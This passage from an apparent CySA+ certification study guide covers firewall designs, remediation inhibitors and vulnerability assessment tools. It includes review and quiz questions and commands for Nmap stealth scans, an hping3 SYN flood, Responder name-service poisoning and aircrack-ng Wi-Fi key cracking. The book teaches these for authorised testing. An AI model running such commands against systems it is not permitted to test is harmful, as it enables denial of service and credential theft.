referred to as “reducing the attack surface.”
A dual-homed firewall is a firewall that has two network
interfaces: one pointing to the internal network and another
connected to the untrusted network. In many cases, routing
between these interfaces is turned off. The firewall software
allows or denies traffic between the two interfaces, based on the
firewall rules configured by the administrator. The danger of
relying on a single dual-homed firewall is that it provides a
single point of failure. If this device is compromised, the
network is compromised also. If it suffers a denial-of-service
(DoS) attack, no traffic can pass. Neither of these is a good
situation. In some cases, a firewall may be multihomed.
One popular type is the three-legged firewall. This configuration
has three interfaces: one connected to the untrusted network,
one to the internal network, and the last one to a part of the
network called a demilitarized zone (DMZ). A DMZ is a portion
of the network where systems will be accessed regularly from an
untrusted network. These might be web servers or an e-mail
server, for example. The firewall can be configured to control
the traffic that flows between the three networks, but it is
important to be somewhat careful with traffic destined for the
DMZ and to treat traffic to the internal network with much
more suspicion.
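As a rough sketch of a three-legged policy (the interface names
and the DMZ server address are assumptions, not taken from any
particular deployment), the rules below let anyone reach a DMZ
web server, let internal hosts initiate outbound connections,
and include no rule that lets the DMZ initiate traffic into the
internal network:

# Assumed interfaces: eth0 = untrusted, eth1 = internal, eth2 = DMZ
iptables -P FORWARD DROP
# anyone may reach the DMZ web server on HTTPS
iptables -A FORWARD -o eth2 -d 192.0.2.10 -p tcp --dport 443 -j ACCEPT
# internal hosts may initiate outbound connections
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT
# return traffic for established connections; note there is no
# DMZ-to-internal rule
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT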
Although the firewalls discussed thus far typically connect
directly to an untrusted network (at least one interface does), a
screened host is a firewall that is between the final router and
the internal network. When traffic comes into the router and is
forwarded to the firewall, it is inspected before going into the
internal network.
A screened subnet takes this concept a step further. In this case,
two firewalls are used, and traffic must be inspected at both
firewalls to enter the internal network. It is called a screened
subnet because there is a subnet between the two firewalls that
can act as a DMZ for resources from the outside world. In the
real world, these various firewall approaches are mixed and
matched to meet requirements, so you might find elements of
all these architectural concepts applied to a specific situation.
INHIBITORS TO REMEDIATION
In some cases, there may be issues that make implementing a
particular solution inadvisable or impossible. Some of these
inhibitors to remediation are as follows:
Memorandum of understanding (MOU): An MOU is a
document that, while not legally binding, indicates a general
agreement between the principals to do something together. An
organization may have MOUs with multiple organizations, and
MOUs may in some instances contain security requirements that
inhibit or prevent the deployment of certain measures.
Service-level agreement (SLA): An SLA is a document that
specifies a service to be provided by a party, the costs of the service,
and the expectations of performance. These contracts may exist
with third parties from outside the organization and between
departments within an organization. Sometimes these SLAs may
include specifications that inhibit or prevent the deployment of
certain measures.
Organizational governance: Organizational governance refers
to the process of controlling an organization’s activities, processes,
and operations. When the process is unwieldy, as it is in some very
large organizations, the application of countermeasures may be
frustratingly slow. One of the reasons for including upper
management in the entire process is to use the weight of authority
to cut through the red tape.
Business process interruption: The deployment of mitigations
cannot be done in such a way that business operations and
processes are interrupted. Therefore, the need to conduct these
activities during off-hours can also be a factor that impedes the
remediation of vulnerabilities.
Degrading functionality: Some solutions create more issues
than they resolve. In some cases, it may be impossible to implement a
mitigation because it would break mission-critical applications or
processes. The organization may need to research an alternative
solution.
Legacy systems: Legacy systems are those that are older and
may be less secure than newer systems. Some of these older systems
are no longer supported and are not receiving updates. In many
cases, organizations have legacy systems performing critical
operations and the enterprise cannot upgrade those systems for one
reason or another. It could be that the current system cannot be
upgraded because it would be disruptive to sales or marketing.
Sometimes politics prevents these upgrades. In some cases the
money is just not there for the upgrade. For whatever reason, the
inability to upgrade is an inhibitor to remediation.
Proprietary systems: In some cases, solutions have been
developed by the organization that do not follow standards and are
proprietary in nature. In this case the organization is responsible
for updating the systems to address security issues. Many times this
does not occur. For these types of systems, the upgrade path is even
more difficult because performing the upgrade is not simply a
matter of paying for the upgrade and applying the upgrade. The
work must be done by the programmers in the organization that
developed the solution (if they are still around). Obviously the
inability to upgrade is an inhibitor to remediation.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep practice
test software.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 3-4
lists a reference of these key topics and the page numbers on
which each is found.
Table 3-4 Key Topics in Chapter 3
Key Topic Element | Description | Page Number
Bulleted list | Goals of the vulnerability assessment | 41
Bulleted list | Assigning a level of criticality to a particular data set | 43
Bulleted list | Active vs. passive scanning | 43
Bulleted list | Scanner result types | 44
Step list | Patch management life cycle | 46
Bulleted list | System hardening examples | 46
Bulleted list | Methods used to handle risk | 47
Bulleted list | Threat mitigation validation steps | 48
Bulleted list | Scanning risks | 49
Bulleted list | Benefits of credentialed scans | 51
Table 3-2 | Server-Based vs. Agent-Based Scanning | 52
Bulleted list | Security legislation | 55
Table 3-3 | High-Level Overview of PCI DSS | 56
Bulleted list | Categories of IDSs | 57
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
asset criticality
passive vulnerability scanning
active vulnerability scanning
enumeration
true positive
false positive
true negative
false negative
configuration baseline
patching
hardening
compensating controls
risk acceptance
vulnerability feed
scope
credentialed scan
non-credentialed scan
external scan
internal scan
memorandum of understanding (MOU)
service-level agreement (SLA)
legacy systems
proprietary systems
REVIEW QUESTIONS
1. ____________________ describes the relative value of
an asset to the organization.
2. List at least one question that should be raised to determine
asset criticality.
3. Nessus Network Monitor is an example of a(n)
_____________ scanner.
4. Match the following terms with their definition.
Terms | Definitions
False positive | Occurs when the scanner does not identify a vulnerability that exists.
True positive | Occurs when the scanner correctly determines that a vulnerability does not exist.
False negative | Occurs when the scanner correctly identifies a vulnerability.
True negative | Occurs when the scanner identifies a vulnerability that does not exist.
5. ____________________ are security settings that are
required on devices of various types.
6. Place the following patch management life cycle steps in
order.
Install the patches in the live environment.
Determine the priority of the patches and schedule the patches for
deployment.
Ensure that the patches work properly.
Test the patches.
7. When you are encrypting sensitive data, you are
implementing a(n) _________________.
8. List at least two logical hardening techniques.
9. Match the following risk-handling techniques with their
definitions.
Method | Definition
Risk transfer | Understanding and accepting the level of risk as well as the cost of damages that can occur
Risk mitigation | Terminating the activity that causes a risk or choosing an alternative that is not as risky
Risk avoidance | Passing on the risk to a third party, such as an insurance company
Risk acceptance | Defining the acceptable risk level the organization can tolerate and reducing the risk to that level
10. List at least one risk to scanning.
Chapter 4
Analyzing Assessment
Output
This chapter covers the following topics related to Objective 1.4
(Given a scenario, analyze the output from common vulnerability
assessment tools) of the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 certification exam:
Web application scanner: Covers the OWASP Zed Attack Proxy
(ZAP), Burp Suite, Nikto, and Arachni scanners.
Infrastructure vulnerability scanner: Covers the Nessus,
OpenVAS, and Qualys scanners.
Software assessment tools and techniques: Explains static
analysis, dynamic analysis, reverse engineering, and fuzzing.
Enumeration: Describes Nmap, hping, active vs. passive
enumeration, and Responder.
Wireless assessment tools: Covers Aircrack-ng, Reaver, and
oclHashcat.
Cloud infrastructure assessment tools: Covers ScoutSuite,
Prowler, and Pacu.
When assessments are performed, the data that is gathered
must be analyzed. The format of the output generated by the
various vulnerability assessment tools may be intuitive, but in
many cases it is not.
Analysts must be able to read and correctly interpret the output
to identify issues that may exist. This chapter is dedicated to
analyzing vulnerability assessment output.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these six self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table 4-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 4-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section | Question
Web Application Scanner | 1
Infrastructure Vulnerability Scanner | 2
Software Assessment Tools and Techniques | 3
Enumeration | 4
Wireless Assessment Tools | 5
Cloud Infrastructure Assessment Tools | 6
1. Which of the following is a type of proactive monitoring and
uses external agents to run scripted transactions against an
application?
1. RUM
2. Synthetic transaction monitoring
3. Reverse engineering
4. OWASP
2. Which of the following is an example of a cloud-based
vulnerability scanner?
1. OpenVAS
2. Qualys
3. Nikto
4. NESSUS
3. Which step in the software development life cycle (SDLC)
follows the design step?
1. Gather requirements
2. Certify/accredit
3. Develop
4. Test/validate
4. Which of the following is the process of discovering and
listing information?
1. Escalation
2. Discovery
3. Enumeration
4. Penetration
5. Which of the following is a set of command-line tools you
can use to sniff WLAN traffic?
1. hping3
2. Aircrack-ng
3. Qualys
4. Reaver
6. Which of the following is a data collection tool that allows
you to use longitudinal survey panels to track and monitor
the cloud environment?
1. Prowler
2. ScoutSuite
3. Pacu
4. Nikto
FOUNDATION TOPICS
WEB APPLICATION SCANNER
Web vulnerability scanners focus on discovering
vulnerabilities in web applications. These tools can operate in
two ways: synthetic transaction monitoring or real user
monitoring. In synthetic transaction monitoring, preformed
(synthetic) transactions are performed against the web
application in an automated fashion, and the behavior of the
application is recorded. In real user monitoring, real user
transactions are monitored while the web application is live.
Synthetic transaction monitoring, which is a type of
proactive monitoring, uses external agents to run scripted
transactions against a web application. This type of monitoring
is often preferred for websites and applications. It provides
insight into the application’s availability and performance and
warns of any potential issue before users experience any
degradation in application behavior. For example, Microsoft’s
System Center Operations Manager (SCOM) uses synthetic
transactions to monitor databases, websites, and TCP port
usage.
In contrast, real user monitoring (RUM), which is a type of
passive monitoring, captures and analyzes every transaction of
every web application or website user. Unlike synthetic
transaction monitoring, which attempts to gain performance
insights by regularly testing synthetic interactions, RUM cuts
through the guesswork, seeing exactly how users are interacting
with the application.
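At its simplest, a synthetic transaction is just a scripted
request replayed on a schedule while availability and response
time are recorded. The following curl sketch illustrates the
idea; the URL and form fields are hypothetical placeholders, not
part of any product discussed here:

# post a scripted login and report the status code and total response time
curl -s -o /dev/null \
     -w "HTTP %{http_code} in %{time_total}s\n" \
     -d "user=monitor&pass=example" \
     https://app.example.com/login

A monitoring agent would run a check like this from several
locations, alerting when the status code or response time
deviates from the baseline.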
Many web application scanners are available. These tools scan
an application for common security issues with cookie
management, PHP scripts, SQL injections, and other problems.
Some examples of these tools are covered in this section.
Burp Suite
The Burp Suite is a suite of tools, one of which can be used for
testing web applications. It can scan an application for
vulnerabilities and can also be used to crawl an application (to
discover content). This commercial software is available for
Windows, Linux, and macOS. It can also be used for exploiting
vulnerabilities. For more information, see
https://portswigger.net/burp.
OWASP Zed Attack Proxy (ZAP)
The Open Web Application Security Project (OWASP) produces
an interception proxy called OWASP Zed Attack Proxy
(ZAP). It performs many of the same functions as Burp, and so
it also falls into the exploit category. It can monitor the traffic
between a client and a server, crawl the application for content,
and perform vulnerability scans. For more information, see
https://owasp.org/www-project-zap/.
Nikto
Nikto is a vulnerability scanner that is dedicated to web
servers. It is designed for Linux but can be run in Windows
through a Perl interpreter. This tool is not stealthy, but it is a
fast scanner. Everything it does is recorded in your logs. It
generates a lot of information, much of it normal or
informational. It is a command-line tool that is often run from
within Kali Linux, a distribution that comes preinstalled with
more than 300 penetration-testing programs. For more
information, see https://tools.kali.org/information-gathering/nikto.
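A typical invocation names the target host with -h and,
optionally, the port with -p; the host below is a placeholder:

nikto -h https://www.example.com -p 443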
Arachni
Arachni is a Ruby framework for assessing the security of a
web application. It is often used by penetration testers. It is
open source, works with all major operating systems (Windows,
macOS, and Linux), and is distributed via portable packages
that allow for instant deployment. Arachni can be used either at
the command line or via the web interface, shown in Figure 4-1.
Figure 4-1 Arachni
INFRASTRUCTURE VULNERABILITY
SCANNER
An infrastructure vulnerability scanner probes for a variety of
security weaknesses, including misconfigurations, out-of-date
software, missing patches, and open ports. These solutions can
be on premises or cloud based.
Infrastructure vulnerability scanners were covered in detail in
Chapter 18.
Nessus
One of the most widely used vulnerability scanners is Nessus
Professional, a proprietary tool developed by Tenable
Network Security. It is free of charge for personal use in a non-enterprise environment. By default, Nessus Professional starts
by listing at the top of the output the issues found on a host that
are rated with the highest severity, as shown in Figure 4-2.
Figure 4-2 Example Nessus Output
For the computer scanned in Figure 4-2, you can see that there
is one high-severity issue (the default password for a Firebird
database located on the host), and there are five medium-level
issues, including two SSL certificates that cannot be trusted and
a remote desktop man-in-the-middle attack vulnerability. For
more information, see
https://www.tenable.com/products/nessus.
OpenVAS
As you might suspect from the name, the OpenVAS tool is
open source. It was developed from the Nessus code base and is
available as a package for many Linux distributions. The
scanner is accompanied by a regularly updated feed of
network vulnerability tests (NVTs). It uses the Greenbone
console, shown in Figure 4-3. For more information, see
https://www.openvas.org/.
Figure 4-3 OpenVAS
SOFTWARE ASSESSMENT TOOLS AND
TECHNIQUES
Many organizations create software either for customers or for
their own internal use. When software is developed, the earlier
in the process security is considered, the less it will cost to
secure the software. It is best for software to be secure by
design. Secure coding standards are practices that, if followed
throughout the software development life cycle (SDLC),
help to reduce the attack surface of an application.
In Chapter 9, “Software Assurance Best Practices,” you will
learn about the SDLC, a set of ordered steps to help ensure that
software is developed to enhance both security and
functionality. As a quick preview, the SDLC steps are listed
here:
Step 1. Plan/initiate project
Step 2. Gather requirements
Step 3. Design
Step 4. Develop
Step 5. Test/validate
Step 6. Release/maintain
Step 7. Certify/accredit
Step 8. Perform change management and configuration
management/replacement
This section concentrates on Steps 5 and 7, which are where
testing of the software occurs. This testing is covered in this
chapter because it is a part of vulnerability management. This
testing or validation can take many forms.
Static Analysis
Static code analysis is performed without the code
executing. Code review and testing must occur throughout the
entire SDLC. Code review and testing must identify bad
programming patterns, security misconfigurations, functional
bugs, and logic flaws.
Code review and testing in the planning and design phases
include architecture security reviews and threat modeling. Code
review and testing in the development phase include static
source code analysis and manual code review and static binary
code analysis and manual binary review. Once an application is
deployed, code review and testing involve penetration testing,
vulnerability scanning, and fuzz testing.
Static code review can be done with scanning tools that look for
common issues. These tools can use a variety of approaches to
find bugs, including the following:
Data flow analysis: This analysis looks at runtime information
while the software is in a static state.
Control flow graph: A graph of the components and their
relationships can be developed and used for testing by focusing on
the entry and exit points of each component or module.
Taint analysis: This analysis attempts to identify variables that
are tainted with user-controllable input.
Lexical analysis: This analysis converts source code into tokens
of information to abstract the code and make it easier to manipulate
for testing purposes.
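As a crude illustration of the lexical idea, even a pattern
match over source tokens can flag dangerous constructs. The
sketch below (the src/ directory is an assumption) searches a C
source tree for string functions that commonly cause buffer
overflows; real static analyzers go much further, but the
token-matching principle is the same:

# flag classic unsafe C string functions anywhere in the source tree
grep -rnE --include='*.c' '\b(strcpy|strcat|gets|sprintf)\s*\(' src/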
Code review is the systematic investigation of the code for
security and functional problems. It can take many forms, from
simple peer review to formal code review. There are two main
types of reviews:
Formal review: This is an extremely thorough, line-by-line
inspection, usually performed by multiple participants using
multiple phases. This is the most time-consuming type of code
review but the most effective at finding defects.
Lightweight: This type of code review is much more cursory than
a formal review. It is usually done as a normal part of the
development process. It can happen in several forms:
Pair programming: Two coders work side by side, checking
one another’s work as they go.
Email: Code is emailed around to colleagues for them to review
when time permits.
Over the shoulder: Coworkers review the code while the
author explains his or her reasoning.
Tool-assisted: Perhaps the most efficient method, this method
uses automated testing tools.
While code review is most typically performed on in-house
applications, it may be warranted in other scenarios as well. For
example, say that you are contracting with a third party to
develop a web application to process credit cards. Considering
the sensitive nature of the application, it would not be unusual
for you to request your own code review to assess the security of
the product.
In many cases, more than one tool should be used in testing an
application. For example, an online banking application that
has had its source code updated should undergo both
penetration testing with accounts of varying privilege levels and
a code review of the critical modules to ensure that defects there
do not exist.
Dynamic Analysis
Dynamic analysis is testing performed while the software is
running. This testing can be performed manually or by using
automated testing tools. There are two general approaches to
dynamic testing:
Synthetic transaction monitoring: A type of proactive
monitoring, often preferred for websites and applications. It
provides insight into the application’s availability and performance,
warning of any potential issue before users experience any
degradation in application behavior. It uses external agents to run
scripted transactions against an application. For example,
Microsoft’s System Center Operations Manager (SCOM) uses
synthetic transactions to monitor databases, websites, and TCP port
usage.
Real user monitoring (RUM): A type of passive monitoring that
captures and analyzes every transaction of every application or
website user. Unlike synthetic monitoring, which attempts to gain
performance insights by regularly testing synthetic interactions,
RUM cuts through the guesswork by analyzing exactly how your
users are interacting with the application.
Reverse Engineering
In 1990, the Institute of Electrical and Electronics Engineers
(IEEE) defined reverse engineering as “the process of
analyzing a subject system to identify the system’s components
and their interrelationships, and to create representations of the
system in another form or at a higher level of abstraction,”
where the “subject system” is the end product of software
development.
Reverse engineering techniques can be applied in several areas,
including the study of the security of in-house software. In
Chapter 16, “Applying the Appropriate Incident Response
Procedure,” you’ll learn how reverse engineering is applied to
the incident response procedure. In Chapter 12, “Implementing
Configuration Changes to Existing Controls to Improve
Security,” you’ll learn how reverse engineering applies to the
malware analysis process. The techniques you will learn about
in those chapters can also be used to locate security issues with
in-house software.
Fuzzing
Fuzz testing, or fuzzing, involves injecting invalid or
unexpected input (sometimes called faults) into an application
to test how the application reacts. It is usually done with a
software tool that automates the process. Inputs can include
environment variables, keyboard and mouse events, and
sequences of API calls. Figure 4-4 shows the logic of the fuzzing
process.
Figure 4-4 Fuzz Testing
Two types of fuzzing can be used to identify susceptibility to a
fault injection attack:
Mutation fuzzing: Involves changing the existing input values
(blindly)
Generation-based fuzzing: Involves generating the inputs from
scratch, based on the specification/format
The following measures can help prevent fault injection attacks:
Implement fuzz testing to help identify problems.
Adhere to safe coding and project management practices.
Deploy application-level firewalls.
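A minimal mutation-fuzzing loop can even be sketched in shell.
In the sketch below, the target program ./parser and the seed
file seed.bin (assumed to be at least 64 bytes long) are
hypothetical; each iteration blindly corrupts one byte of a
known-good input and watches the target's exit status:

# mutate one random byte of a valid input, then feed it to the target
for i in $(seq 1 100); do
  cp seed.bin input.bin
  off=$((RANDOM % 64))
  printf '\x00' | dd of=input.bin bs=1 seek=$off count=1 conv=notrunc 2>/dev/null
  ./parser input.bin >/dev/null 2>&1 || echo "abnormal exit on iteration $i"
done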
ENUMERATION
Enumeration is the process of discovering and listing
information. Network enumeration is the process of discovering
pieces of information that might be helpful in a network attack
or compromise. There are several techniques used to perform
enumeration and several tools that make the process easier for
both testers and attackers. Let’s take a look at these techniques
and tools.
Nmap
While network scanning can be done with more blunt tools, like
ping, Nmap is stealthier and may be able to perform its
activities without setting off firewalls and IDSs. It is valuable to
note that while we are discussing Nmap in the context of
network scanning, this tool can be used for many other
operations, including performing certain attacks. When used for
scanning, it typically locates the devices, locates the open ports
on the devices, and determines the OS on each host.
After performing Nmap scans with certain flags set in the scan
packets, security analysts (and hackers) can make certain
assumptions based on the responses received. These flags are
used to control the TCP connection process and so are present
only in those packets. Figure 4-5 shows a TCP header with the
important flags circled. Normally, flags are “turned on” as a
result of the normal TCP process, but a hacker can craft packets
that set whichever flags he wants to check.
Figure 4-5 TCP Header
Figure 4-5 shows these flags, among others:
URG: Urgent pointer field significant
ACK: Acknowledgment field significant
PSH: Push function
RST: Reset the connection
SYN: Synchronize sequence numbers
FIN: No more data from sender
Nmap exploits weaknesses with three scan types:
Null scan: A Null scan is a series of TCP packets that contain a
sequence number of 0 and no set flags. Because the Null scan does
not contain any set flags, it can sometimes penetrate firewalls and
edge routers that filter incoming packets with particular flags.
When such a packet is sent, two responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.
Figure 4-6 shows the result of a Null scan using the command
nmap -sN. In this case, nmap received no response but was
unable to determine whether that was because a firewall was
blocking the port or the port was closed on the target.
Therefore, it is listed as open|filtered.
Figure 4-6 Null Scan
FIN scan: This type of scan sets the FIN bit. When this packet is
sent, two responses are possible:
No response: The port is open on the target.
RST/ACK: The port is closed on the target.
Example 4-1 shows sample output of a FIN scan using the
command nmap -sF, with the -v included for verbose output.
Again, nmap received no response but was unable to determine
whether that was because a firewall was blocking the port or the
port was closed on the target. Therefore, it is listed as
open|filtered.
Example 4-1 FIN Scan Using nmap –sF
# nmap -sF -v 192.168.0.7
Starting nmap 3.81 at 2016-01-23 21:17 EDT
Initiating FIN Scan against 192.168.0.7 [1663 ports] at 21:17
The FIN Scan took 1.51s to scan 1663 total ports.
Host 192.168.0.7 appears to be up ... good.
Interesting ports on 192.168.0.7:
(The 1654 ports scanned but not shown below are in state: closed)
PORT     STATE         SERVICE
21/tcp   open|filtered ftp
22/tcp   open|filtered ssh
23/tcp   open|filtered telnet
79/tcp   open|filtered finger
110/tcp  open|filtered pop3
111/tcp  open|filtered rpcbind
514/tcp  open|filtered shell
886/tcp  open|filtered unknown
2049/tcp open|filtered nfs
MAC Address: 00:03:47:6D:28:D7 (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 2.276 seconds
Raw packets sent: 1674 (66.9KB) | Rcvd: 1655 (76.1KB)
XMAS scan: This type of scan sets the FIN, PSH, and URG flags.
When this packet is sent, two responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.
Figure 4-7 shows the result of this scan, using the command
nmap -sX. In this case nmap received no response but was
unable to determine whether that was because a firewall was
blocking the port or the port was closed on the target.
Therefore, it is listed as open|filtered.
Figure 4-7 XMAS Scan
Null, FIN, and XMAS scans all serve the same purpose: to
discover open ports and ports blocked by a firewall. They differ
only in the switch used. While many more scan types and
attacks can be launched with Nmap, these three are commonly
used during environmental reconnaissance testing to learn what
a hacker might discover so that any gaps in security can be
closed before the hacker gets there.
For more information on Nmap, see https://nmap.org/.
Host Scanning
Host scanning involves identifying the live hosts on a
network or in a domain namespace. Nmap and other scanning
tools (such as ScanLine and SuperScan) can be used for this.
Sometimes called a ping scan, a host scan records responses to
pings sent to every address in the network. You can also
combine a host scan with a port scan by using the proper
arguments to the command. During environmental
reconnaissance testing, you can make use of these scanners to
identify all live hosts. You may discover hosts that shouldn’t be
there. To execute this scan from nmap, the command is nmap
-sP 192.168.0.0-100, where 0-100 is the range of IP
addresses to be scanned in the 192.168.0.0 network. Figure 4-8
shows an example of the output from this command. This
command’s output lists all devices that are on. For each one, the
MAC address is also listed.
Figure 4-8 Host Scan with Nmap
hping
hping (and the newer version, hping3) is a command-line-oriented TCP/IP packet assembler/analyzer that goes beyond
simple ICMP echo requests. It supports TCP, UDP, ICMP, and
RAW-IP protocols and also has a traceroute mode. The
following is a subset of the operations possible with hping:
Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
What is significant about hping is that it can be used to create or
assemble packets. Attackers use packet assembly tools to create
packets that allow them to mount attacks. Testers can also use
hping to create malicious packets to assess the response of the
network defenses or to identify vulnerabilities that may exist.
A common attack is a DoS attack using what is called a SYN
flood. In this attack, the target is overwhelmed with SYN
packets whose handshakes are never completed. The target
answers each SYN packet with a SYN-ACK and reserves memory
for the expected ACK in response. Because the attacker never
answers, the target system eventually runs out of memory,
making it essentially a dead device. This scenario is
shown in Figure 4-9.
Figure 4-9 SYN Flood
Example 4-2 demonstrates how to deploy a SYN flood by
executing the hping command at the terminal.
Example 4-2 Deploying a SYN Flood with hping
$ sudo hping3 -i u1 -S -p 80 -c 10 192.168.1.1
HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes

--- 192.168.1.1 hping statistic ---
10 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
The command in Example 4-2 would send TCP SYN packets to
192.168.1.1. Including sudo is necessary because hping3
creates raw packets for the task. For raw sockets/packets, root
privilege is necessary on Linux. The parts of the command and
the meaning of each are described as follows:
-i u1 means wait for 1 microsecond between each packet
-S sets the SYN flag
-p 80 means target port 80
-c 10 means send 10 packets
Were this a true attack, you would expect to see many more
packets sent; however, you can see how this tool can be used to
assess the likelihood that such an attack would succeed. For
more information, see https://tools.kali.org/information-gathering/hping3.
Active vs. Passive
Chapter 3, “Vulnerability Management Activities,” covered
active and passive scanning. The concept of active and passive
enumeration is similar. Active enumeration is when you
send packets of some sort to the network and then assess
responses. An example of this would be using nmap to send
crafted packets that interrogate the accessibility of various ports
(port scan). Passive enumeration does not send packets of
any type but captures traffic and makes educated assumptions
from the traffic. An example is using a packet capture utility
(sniffer) to look for malicious traffic on the network.
Responder
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS
Name Service (NBT-NS) are Microsoft Windows components
that serve as alternate methods of host identification.
Responder is a tool that can be used for a number of things,
among them answering NBT and LLMNR name requests. Doing
this poisons the service so that the victims communicate with
the adversary-controlled system. Once the name system is
compromised, Responder captures hashes and credentials that
are sent to the system after the name services have been
poisoned.
Figure 4-10 shows that after the target was convinced to talk to
Responder, it was able to capture the hash sent for
authentication, which could then be used to attempt to crack the
password.
Figure 4-10 Capturing Authentication Hashes with
Responder
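In its simplest form, Responder is pointed at the interface on
which it should answer poisoned LLMNR/NBT-NS requests; the
interface name below is an assumption:

# answer LLMNR and NBT-NS name requests seen on eth0
sudo responder -I eth0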
WIRELESS ASSESSMENT TOOLS
To assess wireless networks for vulnerabilities, you need tools
that can use wireless antennas and sensors to capture and
examine the wireless traffic. As a security professional tasked
with identifying wireless vulnerabilities, you must also be
familiar with the tools used to compromise wireless networks.
Let’s discuss some of these tools.
Aircrack-ng
Aircrack-ng is a set of command-line tools you can use to
sniff wireless networks, among other things. Installers for this
tool are available for both Linux and Windows. It is important
to ensure that your device’s wireless chipset and driver support
this tool.
Aircrack-ng focuses on these areas of Wi-Fi security:
Monitoring: Packet capture and export of data to text files for
further processing by third-party tools
Attacking: Replay attacks, deauthentication, fake access points,
and others via packet injection
Testing: Checking Wi-Fi cards and driver capabilities (capture and
injection)
Cracking: WEP and WPA PSK (WPA1 and 2)
As you can see, capturing wireless traffic is a small part of what
this tool can do. The command for capturing is airodump-ng.
Figure 4-11 shows Aircrack-ng being used to attempt to crack an
encryption key. It attempted 1514 keys before locating the
correct one. For more information on Aircrack-ng, see
https://www.aircrack-ng.org/.
Figure 4-11 Aircrack-ng
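A common workflow (the BSSID, channel, wordlist, and
monitor-mode interface shown here are placeholders) is to
capture traffic with airodump-ng and then run the capture
through aircrack-ng with a wordlist:

# capture frames from the target AP on channel 6 into capture-01.cap
airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon
# attempt to recover the WPA PSK from the captured handshake
aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap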
Reaver
Reaver is both a package of tools and a command-line tool
within the package called reaver that is used to attack Wi-Fi
Protected Setup (WPS). Example 4-3 shows the reaver
command and its arguments.
Example 4-3 Reaver: Wi-Fi Protected Setup Attack Tool
root@kali:~# reaver -h

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
  -i, --interface=<wlan>        Name of the monitor-mode interface to use
  -b, --bssid=<mac>             BSSID of the target AP

Optional Arguments:
  -m, --mac=<mac>               MAC of the host system
  -e, --essid=<ssid>            ESSID of the target AP
  -c, --channel=<channel>       Set the 802.11 channel for the interface (implies -f)
  -s, --session=<file>          Restore a previous session file
  -C, --exec=<command>          Execute the supplied command upon successful pin recovery
  -f, --fixed                   Disable channel hopping
  -5, --5ghz                    Use 5GHz 802.11 channels
  -v, --verbose                 Display non-critical warnings (-vv or -vvv for more)
  -q, --quiet                   Only display critical messages
  -h, --help                    Show help

Advanced Options:
  -p, --pin=<wps pin>           Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
  -d, --delay=<seconds>         Set the delay between pin attempts [1]
  -l, --lock-delay=<seconds>    Set the time to wait if the AP locks WPS pin attempts [60]
  -g, --max-attempts=<num>      Quit after num pin attempts
  -x, --fail-wait=<seconds>     Set the time to sleep after 10 unexpected failures [0]
  -r, --recurring-delay=<x:y>   Sleep for y seconds every x pin attempts
  -t, --timeout=<seconds>       Set the receive timeout period [10]
  -T, --m57-timeout=<seconds>   Set the M5/M7 timeout period [0.40]
  -A, --no-associate            Do not associate with the AP (association must be done by another application)
  -N, --no-nacks                Do not send NACK messages when out of order packets are received
  -S, --dh-small                Use small DH keys to improve crack speed
  -L, --ignore-locks            Ignore locked state reported by the target AP
  -E, --eap-terminate           Terminate each WPS session with an EAP FAIL packet
  -J, --timeout-is-nack         Treat timeout as NACK (DIR-300/320)
  -F, --ignore-fcs              Ignore frame checksum errors
  -w, --win7                    Mimic a Windows 7 registrar [False]
  -K, --pixie-dust              Run pixiedust attack
  -Z                            Run pixiedust attack

Example:
  reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
The Reaver package contains other tools as well. Example 4-4
shows the arguments for the wash command of the Wi-Fi
Protected Setup Scan Tool. For more information on Reaver,
see https://tools.kali.org/wireless-attacks/reaver.
Example 4-4 wash: Wi-Fi Protected Setup Scan Tool
root@kali:~# wash -h

Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

Required Arguments:
  -i, --interface=<iface>             Interface to capture packets on
  -f, --file [FILE1 FILE2 FILE3 ...]  Read packets from capture files

Optional Arguments:
  -c, --channel=<num>                 Channel to listen on [auto]
  -n, --probes=<num>                  Maximum number of probes to send to each AP in scan mode [15]
  -F, --ignore-fcs                    Ignore frame checksum errors
  -2, --2ghz                          Use 2.4GHz 802.11 channels
  -5, --5ghz                          Use 5GHz 802.11 channels
  -s, --scan                          Use scan mode
  -u, --survey                        Use survey mode [default]
  -a, --all                           Show all APs, even those without WPS
  -j, --json                          Print extended WPS info as json
  -U, --utf8                          Show UTF8 ESSID (does not sanitize ESSID, dangerous)
  -h, --help                          Show help

Example:
  wash -i wlan0mon
oclHashcat
oclHashcat is a multi-hash cracker that performs brute-force
attacks using general-purpose computing on graphics processing
units (GPGPU). All versions have now been updated and are
simply called hashcat. In GPGPU, the graphics processor is
tasked with running the algorithms that crack the hashes. The
cracking of a hash is shown in Figure 4-12.
